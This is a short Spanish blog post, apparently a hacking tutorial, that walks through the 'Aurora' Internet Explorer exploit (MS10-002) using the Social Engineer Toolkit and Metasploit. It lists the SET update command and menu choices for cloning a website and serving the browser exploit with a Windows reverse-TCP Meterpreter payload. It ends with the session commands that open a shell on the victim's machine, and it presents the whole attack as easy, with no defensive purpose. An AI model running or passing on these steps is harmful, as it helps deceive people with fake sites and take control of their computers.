ie_aurora con el Metasploit para el bug de IE :), pero ahora les traigo lo mismo
pero de forma mucho mas fácil y rápida con el Social Engineer Toolkit v.04 :)
PD: Ojo debes tener el ie_aurora guardado en el Mestasploit
Suerte!
Aurora Attack usando Social Engineer Toolkit
Pasos:
1.- Yo estoy usando el BT4 pero venía con el SET v0.3 así que lo primero será actualizarlo.
# svn co http://svn.thepentest.com/social_engineering_toolkit/ SET/
2.- Ejecutamos el SET (Backtrack>penetration) y seguimos esta secuencia:
2. Website Attack Vectors
2. Clone and setup a fake website
2. The Metasploit Browser Exploit Method
Enter the url to clone: http://www.webclonada.com
1. Microsoft Internet Explorer "Aurora" Memory Corruption (MS10-002)
2. Windows Reverse_TCP Meterpreter
msf exploit(ie_aurora) > sessions -i 1
meterpreter > shell
Y listo! :D
Es muy facil!, acá les dejo un video de muestra;
Social-Engineer Toolkit v0.4 Aurora Attack from David Kennedy on Vimeo.
No hay comentarios:
Publicar un comentario